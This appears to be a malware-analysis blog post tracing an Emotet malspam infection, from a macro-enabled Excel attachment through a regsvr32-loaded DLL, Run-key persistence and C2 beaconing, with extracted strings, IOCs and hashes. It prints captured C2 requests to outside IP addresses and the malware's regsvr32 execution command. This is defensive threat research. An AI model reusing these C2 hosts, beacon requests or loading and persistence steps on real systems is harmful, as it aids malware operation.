2022-03-14 Emotet Malspam

Summary
========
As part of brushing the “rust” off and getting back into the malware analysis and blogging thing, and since I have some free time since I am on holiday, I decided to see what was in the mail filters for anything interesting or fun to play with. I did come across an email that had an encrypted zip attachment that was an Excel spreadsheet that leveraged a macro in it. For this post, I am not digging into the macro. This will be a simple analysis post. As usual, all the artifacts from this investigation can be found over in my Github. The IOCs can be found at the end of the post or via this link here.

****NOTE****
I had some issues with a bug that I was running into with one of the latest versions of ProcMon last night and had to re-run things to get a better version of the ProcMon logs. For that one though, I skipped the “middle man” and just registered the malicious DLL manually to kick off the infection chain. Normally this would have executed via the macro found in the spreadsheet once the macro was enabled. I did include both ProcMon logs for reference though. Also, any references to PID 1616 is from the first ProcMon log. PID 4776 is the equivalent to PID 1616.
***/NOTE****

Analysis
========
From a malware perspective this is a pretty straight forward compromise on both the network side and also the host side.

Once the spreadsheet is downloaded and opened Excel prompts the user to enable the malicious macro as seen below.

Once the macro has been enabled, the compromise chain starts. First, the macro goes and downloads a DLL file from the site arkpp[.]com. The DLL was downloaded to the “C:\Users\%username%\fbd.dll” location (notice the difference in names between the PCAP and once it lands on the host) .

As a side note, the malware author must like dogs as you can see various dog breeds in the stream and within the binary as well.

The file downloaded is called “Qbazm0Hh6NAHgHzpXWnpP.dll” in the PCAP (I renamed it to 2022-03-14-emotet.dll for the “good” ProcMon log and also from the PCAP as 9K1.bin) but is originally named “fbd.dll” and is what is leveraged using regsvr32.exe to register the malicious DLL into Windows. Once that has been registered and the initial process is running, two more child processes are then spawned off the initial one and are killed off automatically until there is only one regsvr32.exe process running with no parent process. The interesting thing about these three processes are what they are doing/touching as it seems like each process is performing a certain function with regards to filesystem and registry “touches”.

Using the “good” version of the ProcMon log, I looked at the three different regsvr32.exe processes filtering on the PIDs to see each process in isolation. Starting with PID 4104 (the parent) this one looks like it really is meant to get started up, then spawn the next child process (PID 5544), and then exit out as seen below.

Jumping over to PID 5544 there is an obvious difference in what the process is doing when compared to the parent. This process looks to be querying various registry settings with a noticeable pattern that looks to be what is called COM abuse since I am seeing numerous queries for different CLSIDs and INPROCSERVER32/LOCALSERVER32 based on some quick Google searches. I came across two good posts about this which can be found here and here. If this is COM abuse, this would give the malware a level of persistence. See Mitre’s ATT&CK for the TL;DR of COM abuse/hijacking. Unfortunately using the PoSH commands found in both posts I was not able to replicate what they were seeing with an exposed COM object on my test VM. I went back and used ProcMon to see if there was anything modified with regards to either INPROCSERVER32/LOCALSERVER32 registry keys and could not see anything in the log. Outside of that activity, there is a lot of fingerprinting activity that the process is doing as seen below.

It is also responsible for copying the original DLL (Qbazm0Hh6NAHgHzpXWnpP.dll/fbd.dll) from the original location to the “C:\Users\%username%\AppData\Local\<random string>\<random string>.<random 3 characters>” and renaming it as seen below.

Which it then finally closes itself out, and creates the final regsvr32.exe process (PID 4776).

The third and final regsvr32 process also continued to perform OS fingerprinting activities, but was reading various crypto registry keys, internet settings, and loading various DLL files related to web calls.

It then proceeded to set the persistence mechanism in the “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\” registry location.

Once this process was up and running, it starts beaconing back out to the C2 as seen below.

I went back and took a look at the “messed up” ProcMon logs and it looks like the log is fine, it is just the newer version of ProcMon that is a little buggy. Anyways, looking at the initial download of the DLL via the Excel process, I noticed that the sizes recorded in ProcMon and in Wireshark are pretty close to each other.

I also used a tool called “strings2” to pull strings from the running regsvr32.exe prcoess (PID 1616 from the first ProcMon log) and piped that out to a log file. The following are some more of the interesting strings that I was able to find in this process. For example, I was able to find some more IP addresses that look to be used as possible C2s. I also found an interesting string (<EXE NAME=”regsvr32.exe” ID=”{c7a85eba-c2d1-41ec-c656-ca2c9221e354}” DBID=”{11111111-1111-1111-1111-111111111111}”/>) that looks to be related to AppShimming. Some more Googling around and I came across another great post from the folks at Red Canary talking about application shims. Based on some of the info in that post, I went back to the second ProcMon log and filtered for anything “SDB” in the path. Sure enough there were hits for the shim database for each process of regsvr32.exe.

While also just searching for keywords in the log, I did come across some bits of my system information as well as seen below.

GET GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq HTTP/1.1
Cookiez=SrzFvmGY1uBOVPYd1yv0gM24V9n393slc5lOHyoJ3GzjD+0impIcqACv6tBXSBSjXN4y6bkvdgVgyTi04ZGUb3EMVy5Y6KjQyGQLpCNagxegJYI+09LWyQmtaak5uJru0CHD0vKVjnI+wl1WgxiCPrsEK2L2f0KeGJzslsXmGuxoOOF8w/85yn8gFURQcKcrxEV1Dq3XRIotzOvob9aqXgBX9QtKz6Ek3r3x7c6K3crDodv4D31dMZLNEYMHvc8rlRRPC/YH+mKNT2O
Host192.99.251.50GET /GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq HTTP/1.1
ConnectionKeep-Alive
Cache-Controlno-cache/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq
BOBSXPC_B4A6FEC6

And also some dead nginx sites as well.

GET /mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv HTTP/1.1
Cookie: AaApNexnjBNTnQ=SrzFvmGY1uBOVPYd1yv0gM24V9n393slc5lOHyoJ3GzjD+0impIcqACv6tBXSBSjXN4y6bkvdgVgyTi04ZGUb3EMVy5Y6KjQyGQLpCNagxegJYI+09LWyQmtaak5uJru0CHD0vKVjnI+wl1WgxiCPrsEK2L2f0KeGJzslsXmGuxoOOF8w/85yn8gFURQcKcrxEV1Dq3XRIotzOvob9aqXlsEniXCixpyq6O3fQAY/fmRl8hDyeSAa/4Fm2pZzBzG/Lu3Lbk5gYkHdQNGcpL+bfulIEI2spcKmLOIwPEzEIgj1uRfThDG+89PJVLsbiLKQDku4g==
Host: 217.182.143.248:8080
Connection: Keep-Alive
Cache-Control: no-cache

MSAFD Irda [IrDA]
MSAFD Tcpip [UDP/IPv6]
MSAFD L2CAP [Bluetooth]
8
HTTP/1.1 502 Bad Gateway
Server: nginx
Date: Tue, 15 Mar 2022 02:01:31 GMT
Content-Type: text/html
Content-Length: 173
Connection: keep-alive

The following section are the other strings that I found interesting.

Query: ":8080"
---------------
Line 16962: https://217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR
Line 16963: https://217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR
Line 17776: https://217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR
Line 17792: https://217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR
Line 18469: 217.182.143.248:8080
Line 18503: https://217.182.143.248:8080/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv
Line 18543: https://217.182.143.248:8080/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv
Line 18550: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 18668: Host: 217.182.143.248:8080
Line 19007: https://217.182.143.248:8080/pjUXpuZmP
Line 19015: https://217.182.143.248:8080/pjUXpuZmP
Line 20396: 217.182.143.248:8080
Line 20701: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 20736: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 20742: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 20758: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 20824: https://217.182.143.248:8080/mgLhALIxcSErTBUYvIACyjUADjKVIxAnbrVFW
Line 20861: https://217.182.143.248:8080/mgLhALIxcSErTBUYvIACyjUADjKVIxAnbrVFW
Line 21105: https://185.4.135.27:8080/
Line 21274: https://185.4.135.27:8080/
Line 21317: 185.4.135.27:8080
Line 21374: 217.182.143.248:8080
Line 21379: 217.182.143.248:8080

Query: "https:"
----------------
Line 16962: https://217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR
Line 16963: https://217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR
Line 17776: https://217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR
Line 17792: https://217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR
Line 18503: https://217.182.143.248:8080/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv
Line 18527: https://217.182.143.248/
Line 18538: https://217.182.143.248/
Line 18543: https://217.182.143.248:8080/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv
Line 18550: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 19007: https://217.182.143.248:8080/pjUXpuZmP
Line 19015: https://217.182.143.248:8080/pjUXpuZmP
Line 20279: https://192.99.251.50/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq
Line 20289: https://192.99.251.50/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq
Line 20701: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 20736: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 20742: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 20758: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 20824: https://217.182.143.248:8080/mgLhALIxcSErTBUYvIACyjUADjKVIxAnbrVFW
Line 20861: https://217.182.143.248:8080/mgLhALIxcSErTBUYvIACyjUADjKVIxAnbrVFW
Line 21105: https://185.4.135.27:8080/
Line 21148: https://192.99.251.50/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq
Line 21151: https://192.99.251.50/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq
Line 21173: https://192.99.251.50/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq
Line 21274: https://185.4.135.27:8080/
Line 21369: https://192.99.251.50/
Line 21372: https://192.99.251.50/
Line 21378: https://192.99.251.50/
Line 21380: https://192.99.251.50/
Line 21398: https://192.99.251.50/
Line 21399: https://185.4.135.27/
Line 21401: https://185.4.135.27/

Query: "regsvr32.exe"
----------------------
Line 28: \regsvr32.exe
Line 345: REGSVR32.EXE
Line 1918: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
Line 2083: Microsoft.Windows.RegSvr32,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\SysWOW64\regsvr32.exe
Line 2190: C:\Windows\SysWOW64\regsvr32.exe
Line 2259: The module "%1" may not compatible with the version of Windows that you're running. Check if the module is compatible with an x86 (32-bit) or x64 (64-bit) version of regsvr32.exe.
Line 2283: REGSVR32.EXE.MUI
Line 2431: C:\Windows\SysWOW64\regsvr32.exe
Line 13917: C:\Windows\SysWOW64\regsvr32.exe
Line 13918: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
Line 13919: C:\Windows\SysWOW64\regsvr32.exe
Line 16665: C:\Windows\SysWOW64\regsvr32.exe
Line 16666: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
Line 16667: C:\Windows\SysWOW64\regsvr32.exe
Line 16732: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
Line 16737: C:\Windows\Temp\AslLog_ApphelpDebug_regsvr32.exe_1616.txt
Line 16742: C:\Windows\Temp\AslLog_shimengstate_regsvr32.exe_1616.txt
Line 16744: C:\Windows\Temp\AslLog_ShimDebugLog_regsvr32.exe_1616.txt
Line 16765: &amp;amp;amp;amp;amp;amp;lt;EXE NAME="regsvr32.exe" ID="{c7a85eba-c2d1-41ec-c656-ca2c9221e354}" DBID="{11111111-1111-1111-1111-111111111111}"/&amp;amp;amp;amp;amp;amp;gt;
Line 16980: C:\Windows\SysWOW64\regsvr32.exe
Line 17180: regsvr32.exe
Line 17188: regsvr32.exe
Line 17255: C:\Windows\SysWOW64\regsvr32.exe
Line 17256: \Device\HarddiskVolume1\Windows\SysWOW64\regsvr32.exe
Line 17327: C:\Windows\SysWOW64\regsvr32.exe
Line 19955: regsvr32.exe
Line 21257: %s\regsvr32.exe /s "%s\%s"
Line 22836: regsvr32.exe:1616 Properties
Line 23048: regsvr32.exe(00000650) (netsvcs) Properties
Line 23166: C:\Windows\SysWOW64\regsvr32.exe
Line 36483: C:\Windows\SysWOW64\regsvr32.exe
Line 46610: [zC:\Windows\SysWOW64\regsvr32.exe
Line 378706: regsvr32.exe
Line 612840: C:\Windows\SysWOW64\regsvr32.exe

Query: "c7a85eba-c2d1-41ec-c656-ca2c9221e354" and the lines around that 
---------------------------------------------------------------------------
=C:=C:\Users\bob\Desktop
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\bob\AppData\Roaming
ChocolateyInstall=C:\ProgramData\chocolatey
ChocolateyLastPathUpdate=132853495844597753
ChocolateyToolsLocation=C:\Tools
CommonProgramFiles=C:\Program Files (x86)\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=BOBS-PC
ComSpec=C:\Windows\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default
HOMEDRIVE=C:
HOMEPATH=\Users\bob
JAVA_HOME=C:\Program Files\OpenJDK\openjdk-11.0.13_8
LOCALAPPDATA=C:\Users\bob\AppData\Local
LOGONSERVER=\\BOBS-PC
NUMBER_OF_PROCESSORS=4
OneDrive=C:\Users\bob\OneDrive
OS=Windows_NT
Path=C:\Program Files\Microsoft Office 15\Root\Office15\;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Python37\Scripts\;C:\Python37\;C:\Python27\;C:\Python27\Scripts;C:\ProgramData\Boxstarter;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\ProgramData\chocolatey\bin;C:\Program Files\Puppet Labs\Puppet\bin;C:\Program Files\OpenJDK\openjdk-11.0.13_8\bin;C:\Program Files\nodejs\;C:\Program Files\Microsoft VS Code\bin;C:\Users\bob\AppData\Local\Microsoft\WindowsApps;C:\Tools\Cmder;;C:\ProgramData\chocolatey\lib\radare2.flare\tools\radare2\bin;C:\Tools\java-deobfuscator-gui;C:\Tools\Bytecode-Viewer;C:\Program Files (x86)\Nmap;C:\ProgramData\chocolatey\lib\rawcap\tools\rawcap;C:\Tools\pyinstxtractor;C:\Tools\oledump;C:\Tools\rtfdump;C:\Tools\msoffcrypto-crack;C:\Program Files (x86)\pdfid;C:\Program Files (x86)\pdfparser;C:\pdfstreamdumper;C:\iDefense\SysAnalyzer;C:\Users\bob\AppData\Local\Programs\Fiddler;C:\Users\bob\AppData\Roaming\npm;C:\Program Files\Microsoft Office 15\root\Client
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_ARCHITEW6432=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 140 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=8c01
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files (x86)
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PROMPT=FLARE$S$d$s$t$_$p$+$g
PSModulePath=C:\Users\bob\Documents\WindowsPowerShell\Modules
PUBLIC=C:\Users\Public
RAW_TOOLS_DIR=C:\Tools
SESSIONNAME=Console
SSLKEYLOGFILE=C:\Users\bob\Documents\ssl-keys.log
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\bob\AppData\Local\Temp
TMP=C:\Users\bob\AppData\Local\Temp
TOOL_LIST_DIR=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FLARE
TOOL_LIST_SHORTCUT=C:\Users\bob\Desktop\FLARE.lnk
USERDOMAIN=BOBS-PC
USERDOMAIN_ROAMINGPROFILE=BOBS-PC
USERNAME=bob
USERPROFILE=C:\Users\bob
VM_COMMON_DIR=C:\ProgramData\FEVM
windir=C:\Windows
_NT_SYMBOL_PATH=symsrv*symsrv.dll*C:\symbols*http://msdl.microsoft.com/download/symbols
C:\Users\bob\Desktop\
C:\Windows\SysWOW64\regsvr32.exe
C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
C:\Windows\SysWOW64\regsvr32.exe
Winsta0\Default
=::=::\
=C:=C:\Users\bob\Desktop
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\bob\AppData\Roaming
ChocolateyInstall=C:\ProgramData\chocolatey
ChocolateyLastPathUpdate=132853495844597753
ChocolateyToolsLocation=C:\Tools
CommonProgramFiles=C:\Program Files (x86)\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=BOBS-PC
ComSpec=C:\Windows\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default
HOMEDRIVE=C:
HOMEPATH=\Users\bob
JAVA_HOME=C:\Program Files\OpenJDK\openjdk-11.0.13_8
LOCALAPPDATA=C:\Users\bob\AppData\Local
LOGONSERVER=\\BOBS-PC
NUMBER_OF_PROCESSORS=4
OneDrive=C:\Users\bob\OneDrive
OS=Windows_NT
Path=C:\Program Files\Microsoft Office 15\Root\Office15\;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Python37\Scripts\;C:\Python37\;C:\Python27\;C:\Python27\Scripts;C:\ProgramData\Boxstarter;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\ProgramData\chocolatey\bin;C:\Program Files\Puppet Labs\Puppet\bin;C:\Program Files\OpenJDK\openjdk-11.0.13_8\bin;C:\Program Files\nodejs\;C:\Program Files\Microsoft VS Code\bin;C:\Users\bob\AppData\Local\Microsoft\WindowsApps;C:\Tools\Cmder;;C:\ProgramData\chocolatey\lib\radare2.flare\tools\radare2\bin;C:\Tools\java-deobfuscator-gui;C:\Tools\Bytecode-Viewer;C:\Program Files (x86)\Nmap;C:\ProgramData\chocolatey\lib\rawcap\tools\rawcap;C:\Tools\pyinstxtractor;C:\Tools\oledump;C:\Tools\rtfdump;C:\Tools\msoffcrypto-crack;C:\Program Files (x86)\pdfid;C:\Program Files (x86)\pdfparser;C:\pdfstreamdumper;C:\iDefense\SysAnalyzer;C:\Users\bob\AppData\Local\Programs\Fiddler;C:\Users\bob\AppData\Roaming\npm;C:\Program Files\Microsoft Office 15\root\Client
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_ARCHITEW6432=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 140 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=8c01
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files (x86)
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PROMPT=FLARE$S$d$s$t$_$p$+$g
PSModulePath=C:\Users\bob\Documents\WindowsPowerShell\Modules
PUBLIC=C:\Users\Public
RAW_TOOLS_DIR=C:\Tools
SESSIONNAME=Console
SSLKEYLOGFILE=C:\Users\bob\Documents\ssl-keys.log
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\bob\AppData\Local\Temp
TMP=C:\Users\bob\AppData\Local\Temp
TOOL_LIST_DIR=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FLARE
TOOL_LIST_SHORTCUT=C:\Users\bob\Desktop\FLARE.lnk
USERDOMAIN=BOBS-PC
USERDOMAIN_ROAMINGPROFILE=BOBS-PC
USERNAME=bob
USERPROFILE=C:\Users\bob
VM_COMMON_DIR=C:\ProgramData\FEVM
windir=C:\Windows
_NT_SYMBOL_PATH=symsrv*symsrv.dll*C:\symbols*http://msdl.microsoft.com/download/symbols
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32
C:\Windows\SYSTEM32;C:\Windows\system;C:\Windows;
vI}m
C:\Users\bob\Desktop\
C:\Windows\SYSTEM32\apphelp.dll
vaoC
C:\Windows\System32\KERNEL32.DLL
\l#mW
C:\Windows\System32\KERNELBASE.dll
C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
2
RC
TLt0
ApphelpDebug
C:\Windows\Temp\AslLog_ApphelpDebug_regsvr32.exe_1616.txt
. }$
TLtX
Apphelp
shimengstate
C:\Windows\Temp\AslLog_shimengstate_regsvr32.exe_1616.txt
ShimDebugLog
C:\Windows\Temp\AslLog_ShimDebugLog_regsvr32.exe_1616.txt
SHA1
Microsoft Primitive Provider
bcryptprimitives.dll
C:\Windows\SYSTEM32\AcLayers.dll
_NT_SYMBOL_PATH=symsrv*symsrv.dll*C:\symbols*http://msdl.microsoft.com/download/symbols
C:\Windows\System32\msvcrt.dll
JAVA_HOME=C:\Program Files\OpenJDK\openjdk-11.0.13_8
TOOL_LIST_DIR=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FLARE
USER32.dll
C:\Windows\System32\USER32.dll
enforcesigninglevelfordependentmodules
SSLKEYLOGFILE=C:\Users\bob\Documents\ssl-keys.log
TOOL_LIST_SHORTCUT=C:\Users\bob\Desktop\FLARE.lnk
C:\Windows\System32\win32u.dll
onlyallowcontrolflowguardenabledbinaries
GDI32.dll
&amp;amp;amp;amp;amp;amp;lt;?xml version="1.0" encoding="utf-8"?&amp;amp;amp;amp;amp;amp;gt;

&amp;amp;amp;amp;amp;amp;lt;MATCHED_ENTRIES&amp;amp;amp;amp;amp;amp;gt;

&amp;amp;amp;amp;amp;amp;lt;EXE NAME="regsvr32.exe" ID="{c7a85eba-c2d1-41ec-c656-ca2c9221e354}" DBID="{11111111-1111-1111-1111-111111111111}"/&amp;amp;amp;amp;amp;amp;gt;

&amp;amp;amp;amp;amp;amp;lt;/MATCHED_ENTRIES&amp;amp;amp;amp;amp;amp;gt;

Query: "outnpny"
-----------------
Line 1918: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
Line 2296: C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb
Line 2432: C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb
Line 13918: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
Line 16666: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
Line 16732: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
Line 16900: C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb
Line 17676: Emehnrnpmefb\outnpny.kzb
Line 18454: outnpny.kzb
Line 23167: C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb
Line 23831: outnpny.kzb

Query: "S-1-5-21-3461203602-4096304019-2269080069" - My system SID
--------------------------------------------------------------------
Line 1861: \REGISTRY\USER\S-1-5-21-3461203602-4096304019-2269080069-1003\SOFTWARE\Microsoft\Windows\Current
Line 1873: \REGISTRY\USER\S-1-5-21-3461203602-4096304019-2269080069-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\RunBags3Z\
Line 13942: \REGISTRY\USER\S-1-5-21-3461203602-4096304019-2269080069-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Line 13957: Y\USER\S-1-5-21-3461203602-4096304019-2269080069-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Line 17613: webcache_{031b98cf-4a69-4c31-ab42-fd9b3c199407}_S-1-5-21-3461203602-4096304019-2269080069-1003
Line 17618: webcache_{031b98cf-4a69-4c31-ab42-fd9b3c199407}_S-1-5-21-3461203602-4096304019-2269080069-1003
Line 17839: webcache_{031b98cf-4a69-4c31-ab42-fd9b3c199407}_S-1-5-21-3461203602-4096304019-2269080069-1003

Query: "nginx"
----------------
GET /mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv HTTP/1.1
Cookie: AaApNexnjBNTnQ=SrzFvmGY1uBOVPYd1yv0gM24V9n393slc5lOHyoJ3GzjD+0impIcqACv6tBXSBSjXN4y6bkvdgVgyTi04ZGUb3EMVy5Y6KjQyGQLpCNagxegJYI+09LWyQmtaak5uJru0CHD0vKVjnI+wl1WgxiCPrsEK2L2f0KeGJzslsXmGuxoOOF8w/85yn8gFURQcKcrxEV1Dq3XRIotzOvob9aqXlsEniXCixpyq6O3fQAY/fmRl8hDyeSAa/4Fm2pZzBzG/Lu3Lbk5gYkHdQNGcpL+bfulIEI2spcKmLOIwPEzEIgj1uRfThDG+89PJVLsbiLKQDku4g==
Host: 217.182.143.248:8080
Connection: Keep-Alive
Cache-Control: no-cache

MSAFD Irda [IrDA]
MSAFD Tcpip [UDP/IPv6]
MSAFD L2CAP [Bluetooth]
8
HTTP/1.1 502 Bad Gateway
Server: nginx
Date: Tue, 15 Mar 2022 02:01:31 GMT
Content-Type: text/html
Content-Length: 173
Connection: keep-alive

Query: "GET /"
-------------------
Line 17700: Host192.99.251.50 GET /GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq HTTP/1.1
Line 18664: GET /mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv HTTP/1.1

Artifacts
==========

OSINT
———-
https://tria.ge/220314-y191labhh9
https://tria.ge/220315-aj5gsaebg4
https://tria.ge/220315-qe56hsbec2
https://app.any.run/tasks/7000b947-2ab9-4e3b-bbcd-eba0c459af96
https://urlhaus.abuse.ch/browse.php?search=www.arkpp.com

IOCs
——–
www[.]arkpp[.]com
146[.]59[.]226[.]45
61[.]61[.]127[.]68
185[.]4[.]135[.]27:8080
192[.]99[.]251[.]50
217[.]182[.]143[.]248:8080

URIs
——–
185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
192.99.251.50/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq
217.182.143.248:8080/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv
217.182.143.248:8080/mgLhALIxcSErTBUYvIACyjUADjKVIxAnbrVFW
217.182.143.248:8080/pjUXpuZmP
217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR

File hashes
—————
2022-03-14_1551.xlsm – 8e586a928eecac9fa5b4dd6980915389f0092c6ec968ffe90dc4ccf3504ae578
fbd.dll – a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22
Emehnrnpmefb/outnpny.kzb – a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22

Munin results
———————
[ ] Processing /outnpny.kzb …
[ ] Processing /2022-03-14_1551.xlsm …
[ ] Processing /fbd.dll …
[+] Processing 3 lines …

1 / 3 > Suspicious
HASH: a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22 COMMENT: outnpny.kzb
VIRUS: Microsoft: Trojan:Win32/Sabsik.FL.B!ml / Kaspersky: VHO:Trojan-Banker.Win32.Convagent.gen
TYPE: Win32 DLL SIZE: 997.0 KB FILENAMES: XHtmlTreeTest.exe, emotet_exe_e4_a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22_2022-03-15__011320._exe
FIRST: 2022-03-15 01:13:22 LAST: 2022-03-15 01:13:22 SUBMISSIONS: 1 REPUTATION: 0
COMMENTS: 0 USERS: – TAGS: PEDLL
RESULT: 4 / 65

2 / 3 > Unknown
HASH: 8e586a928eecac9fa5b4dd6980915389f0092c6ec968ffe90dc4ccf3504ae578 COMMENT: 2022-03-14_1551.xlsm
RESULT: – / –

3 / 3 > Unknown
HASH: a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22 COMMENT: fbd.dll RULE: –
TYPE: – SIZE: 0 FILENAMES: –
